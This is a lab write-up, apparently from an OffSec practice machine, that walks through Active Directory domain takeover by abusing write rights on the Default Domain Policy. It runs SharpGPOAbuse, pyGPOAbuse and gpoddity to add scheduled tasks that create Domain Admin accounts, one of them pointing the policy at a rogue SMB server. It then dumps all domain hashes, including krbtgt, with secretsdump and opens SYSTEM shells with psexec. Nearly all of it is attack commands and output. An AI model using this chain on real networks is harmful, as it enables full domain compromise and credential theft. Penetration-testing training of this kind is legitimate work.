GPO Abuse

It has been identified and confirmed that the current user, anirudh, possesses WriteDacl, WriteOwner, and GenericWrite,granted over the default domain policy object that has a complete control over the target domain; VAULT.OFFSEC

While there are many methods to approach this, I will be focusing on SharpGPOAbuse and pyGPOAbuse

Local

*Evil-WinRM* PS C:\Users\anirudh\Documents> upload SharpGPOAbuse.exe
 
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/vault/SharpGPOAbuse.exe to C:\Users\anirudh\Documents\SharpGPOAbuse.exe
Data: 107860 bytes of 107860 bytes copied
Info: Upload successful!

Leveraging the existing WinRM session, transferring SharpGPOAbuse.exe

*Evil-WinRM* PS C:\Users\anirudh\Documents> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName 'Default Domain Policy' --Domain VAULT.OFFSEC --DomainController dc.vault.offsec 
[+] Domain = vault.offsec
[+] Domain Controller = dc.vault.offsec
[+] Distinguished Name = CN=Policies,CN=System,DC=VAULT,DC=OFFSEC
[+] SID Value of anirudh = S-1-5-21-537427935-490066102-1511301751-1103
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\vault.offsec\SysVol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
 
*Evil-WinRM* PS C:\Users\anirudh\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.

Executing SharpGPOAbuse.exe to add an immediate task to make the anirudh user a local administrator and updating the GPO with gpupdate.exe

*Evil-WinRM* PS C:\Users\anirudh\Documents> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
 
Members
 
-------------------------------------------------------------------------------
Administrator
anirudh
The command completed successfully.

The anirudh user is now a local administrator to the dc.vault.offsec host

Hashdump

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ KRB5CCNAME=anirudh@dc.vault.offsec.ccache impacket-secretsdump VAULT.OFFSEC/anirudh@dc.vault.offsec -k -no-pass -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:608339ddc8f434ac21945e026887dc36:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
VAULT\DC$:plain_password_hex:7690b2a19f4946f27f3e523bdb001acbc508c2b6bcd40ceff07faf4bbc8a62df2c617b8b41e11f8878a0bdffa48d24e49faafedafc4f31597953086636d3ad7be965e646407f2caf560d5a15cc5d42638bf5a9b78d0f8967a0bdefc3781e70f4f70e9b194237e248214f66257516638b1a26ded1d217244e6f211a68d8ad55d93b4e9711e12507b6572663549bff8ddae2e28983d779d89e8bdc1cd95dc0feec10113659fcc46a076e719c592c53bab94138a9e05d5ef78a99d0faa2fafbc7abbcf19918e20c8a87f7cf4e562e5b195b78ae47b9c24919c59a0d6851e045c040840204e162cb6584822692d49bcd4de4
VAULT\DC$:aad3b435b51404eeaad3b435b51404ee:b2990741874b51a9a02969b0312a529d:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3df657e4617398e4ab73e41c6183f8ac3d608523
dpapi_userkey:0xc69b79bdce1e77b22043bbb5bd336c39d3965012
[*] NL$KM 
 0000   4A E2 C6 53 5D 77 02 C9  AE A9 48 23 7C 5B 46 39   J..S]w....H#|[F9
 0010   4A 56 02 3B CC 38 B8 C0  92 DD 41 2C 72 F2 63 46   JV.;.8....A,r.cF
 0020   71 36 1B E3 D2 BA E7 AC  8C BD E9 D5 55 36 C0 07   q6..........U6..
 0030   99 5A 11 4A 24 E4 42 E3  4C 12 3F F5 1B D7 D5 8C   .Z.J$.B.L.?.....
NL$KM:4ae2c6535d7702c9aea948237c5b46394a56023bcc38b8c092dd412c72f2634671361be3d2bae7ac8cbde9d55536c007995a114a24e442e34c123ff51bd7d58c
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54ff9c380cf1a80c23467ff51919146e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c660d4355b25d08a42130cb43d93418c:::
anirudh:1103:aad3b435b51404eeaad3b435b51404ee:74c8075e8506407ebe49bb8de63f6057:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:b2990741874b51a9a02969b0312a529d:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:bf23151dcf4df4d3f6dfd1839f84f67efdb34d4aeb1e8e21aeeed468e02d6204
Administrator:aes128-cts-hmac-sha1-96:f627c58051156eda8beb5d911976d7f7
Administrator:des-cbc-md5:f2d03b9b896eb073
krbtgt:aes256-cts-hmac-sha1-96:1ece11d3d9fa652ff3b5f6cd519869df5b9782f66671225edec3f7937b5af67b
krbtgt:aes128-cts-hmac-sha1-96:28e72f2babc6eaa4926d94bdeb7c4a0f
krbtgt:des-cbc-md5:371fa46843c2f7f8
anirudh:aes256-cts-hmac-sha1-96:de888f9a54f817c010f7162c137e6904b1a1e1a2315fde294125e3c0294e7137
anirudh:aes128-cts-hmac-sha1-96:b29b9cb12534b8914b8b2caf060295ef
anirudh:des-cbc-md5:eaf885b33e1fdf9e
DC$:aes256-cts-hmac-sha1-96:a00f46455447bd6af9131e2050f4712463c43e3d4941d04c64b187647f63d50b
DC$:aes128-cts-hmac-sha1-96:4b8fccb5011f74dccfc798c6ca64961a
DC$:des-cbc-md5:7a5b58c7b008459d
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise

Shell Drop

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ KRB5CCNAME=anirudh@dc.vault.offsec.ccache impacket-psexec VAULT.OFFSEC/anirudh@dc.vault.offsec -k -no-pass -dc-ip $IP       
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Requesting shares on dc.vault.offsec.....
[*] Found writable share ADMIN$
[*] Uploading file GctQpfbI.exe
[*] Opening SVCManager on dc.vault.offsec.....
[*] Creating service lfov on dc.vault.offsec.....
[*] Starting service lfov.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
DC
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.106.172
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.106.254

System level compromise

Remote

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ impacket-pyGPOAbuse 'VAULT.OFFSEC/anirudh:SecureHM' -dc-ip $IP -gpo-id '31B2F340-016D-11D2-945F-00C04FB984F9' -command 'net user adm1n Qwer1234 /ADD /DOMAIN && net group "Domain Admins" /ADD adm1n' -v -f
INFO:root:Version updated
[*] Version updated
SUCCESS:root:ScheduledTask TASK_bd4f73d0 created!
[+] ScheduledTask TASK_bd4f73d0 created!

Using pyGPOAbuse, I can create an immediate task to create an arbitrary DA account; adm1n

*Evil-WinRM* PS C:\Users\anirudh\Documents> gpupdate /Force
Updating policy...
 
Computer Policy update has completed successfully.
User Policy update has completed successfully.

Then using the existing WinRM session, I can update the group policy with gpupdate or I could just wait for it to automatically update itself

*Evil-WinRM* PS C:\Users\anirudh\Documents> net user adm1n
User name                    adm1n
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
 
Password last set            5/2/2025 10:26:26 AM
Password expires             6/13/2025 10:26:26 AM
Password changeable          5/3/2025 10:26:26 AM
Password required            Yes
User may change password     Yes
 
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never
 
Logon hours allowed          All
 
Local Group Memberships
Global Group memberships     *Domain Admins        *Domain Users
The command completed successfully.

The DA user, adm1n, has been successfully created

Hashdump

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ impacket-secretsdump VAULT.OFFSEC/adm1n@dc.vault.offsec -k -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[-] CCache file is not found. Skipping...
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:608339ddc8f434ac21945e026887dc36:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
VAULT\DC$:plain_password_hex:4f3690463a50e4366088dbd47d0ddda5abdfc6aee784cb6409e6fe66adcf8b1cc40a4e9afbfbb064334929c37b6f8b0d5181bcc33d4495b70a0acc77fc0f4a65aa8c8f508a676e55531200f529f35cff7b4ddcd45723177d1f3a66e4b1a463169a7a9404f9f3698dcf4ec8da9d56ecc286aa91d38268f69c28e44ca493b51ab36fc948cbe9a0addd40fb766f5d3676fd19b2a2db8c02a31bfd13bb4052114c147dd35f9cc222f1e6d31b7bfe0299841b3f151a2806ff55c4f9f57e0d55826f3bf8d8825a8851a15a979108970204ae417bf3146c2daffb137e14da006726c3eb670e737aecb764fac9895c290cbc2206
VAULT\DC$:aad3b435b51404eeaad3b435b51404ee:b85549c425f29cdf17afa47dcbf9ca36:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3df657e4617398e4ab73e41c6183f8ac3d608523
dpapi_userkey:0xc69b79bdce1e77b22043bbb5bd336c39d3965012
[*] NL$KM 
 0000   4A E2 C6 53 5D 77 02 C9  AE A9 48 23 7C 5B 46 39   J..S]w....H#|[F9
 0010   4A 56 02 3B CC 38 B8 C0  92 DD 41 2C 72 F2 63 46   JV.;.8....A,r.cF
 0020   71 36 1B E3 D2 BA E7 AC  8C BD E9 D5 55 36 C0 07   q6..........U6..
 0030   99 5A 11 4A 24 E4 42 E3  4C 12 3F F5 1B D7 D5 8C   .Z.J$.B.L.?.....
NL$KM:4ae2c6535d7702c9aea948237c5b46394a56023bcc38b8c092dd412c72f2634671361be3d2bae7ac8cbde9d55536c007995a114a24e442e34c123ff51bd7d58c
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] CCache file is not found. Skipping...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54ff9c380cf1a80c23467ff51919146e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c660d4355b25d08a42130cb43d93418c:::
anirudh:1103:aad3b435b51404eeaad3b435b51404ee:74c8075e8506407ebe49bb8de63f6057:::
adm1n:5101:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:b85549c425f29cdf17afa47dcbf9ca36:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:bf23151dcf4df4d3f6dfd1839f84f67efdb34d4aeb1e8e21aeeed468e02d6204
Administrator:aes128-cts-hmac-sha1-96:f627c58051156eda8beb5d911976d7f7
Administrator:des-cbc-md5:f2d03b9b896eb073
krbtgt:aes256-cts-hmac-sha1-96:1ece11d3d9fa652ff3b5f6cd519869df5b9782f66671225edec3f7937b5af67b
krbtgt:aes128-cts-hmac-sha1-96:28e72f2babc6eaa4926d94bdeb7c4a0f
krbtgt:des-cbc-md5:371fa46843c2f7f8
anirudh:aes256-cts-hmac-sha1-96:de888f9a54f817c010f7162c137e6904b1a1e1a2315fde294125e3c0294e7137
anirudh:aes128-cts-hmac-sha1-96:b29b9cb12534b8914b8b2caf060295ef
anirudh:des-cbc-md5:eaf885b33e1fdf9e
adm1n:aes256-cts-hmac-sha1-96:49477df729d447d45c9a441cea0643c1709a92575402612c7c48dd85df26bd87
adm1n:aes128-cts-hmac-sha1-96:97f2df3be32836899a6ef03b7fc1e452
adm1n:des-cbc-md5:619b04fd52b0d0e3
DC$:aes256-cts-hmac-sha1-96:5da9a8cd09369fe34e1b4b50b569e9ce895e51a664fb2b9feb3cd124539dc2f9
DC$:aes128-cts-hmac-sha1-96:1a4f56a4db48823284b38d3195650610
DC$:des-cbc-md5:73b5a87fb30e159d
[*] Cleaning up...

Domain Level compromise

Shell Drop

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ impacket-psexec VAULT.OFFSEC/adm1n@dc.vault.offsec -k -dc-ip $IP    
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[-] CCache file is not found. Skipping...
[*] Requesting shares on dc.vault.offsec.....
[*] Found writable share ADMIN$
[*] Uploading file fYBKGeIJ.exe
[*] Opening SVCManager on dc.vault.offsec.....
[*] Creating service XsEG on dc.vault.offsec.....
[*] Starting service XsEG.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
DC
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.106.172
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.106.254

System level compromise

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ gpoddity --domain VAULT.OFFSEC --username anirudh --password SecureHM --gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 --dc-ip $IP --command 'net user adm1n2 Qwer1234 /ADD /DOMAIN && net group "Domain Admins" /ADD adm1n2' --rogue-smbserver-ip $tun0 --rogue-smbserver-share smb --verbose       
 
=== GENERATING MALICIOUS GROUP POLICY TEMPLATE ===
 
[*] Downloading the legitimate GPT from SYSVOL
[+] Successfully downloaded legitimate GPO from SYSVOL to 'GPT_out' folder
[*] Injecting malicious scheduled task into initialized GPT
[+] Successfully injected malicious scheduled task
[*] Initiating LDAP connection
[+] LDAP bind successful
[*] Updating downloaded GPO version number to ensure automatic GPO application
[+] Successfully updated downloaded GPO version number
 
=== SPOOFING GROUP POLICY TEMPLATE LOCATION THROUGH gPCFileSysPath ===
 
[*] The save file for current exploit run is cleaning/31B2F340-016D-11D2-945F-00C04FB984F9/2025_05_02-20_14_59.txt
[*] Modifying the gPCFileSysPath attribute of the GPC to '\\192.168.45.204\smb'
[+] Successfully spoofed GPC gPCFileSysPath attribute
[*] Updating the versionNumber attribute of the GPC
[+] Successfully updated GPC versionNumber attribute
[*] Updating the extensionName attribute of the GPC
[+] Successfully updated GPC extensionName attribute
 
=== LAUNCHING GPODDITY SMB SERVER AND WAITING FOR GPO REQUESTS ===
 
If the attack is successful, you will see authentication logs of machines retrieving and executing the malicious GPO
Type CTRL+C when you're done. This will trigger cleaning actions
 
Config file parsed
Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
Config file parsed
Config file parsed
Config file parsed

InfoSec LAB

Explorer

Vault_Privilege_Escalation

GPO Abuse

Local

Hashdump

Shell Drop

Remote

Hashdump

Shell Drop

Interactive Graph View

Table of Contents

Backlinks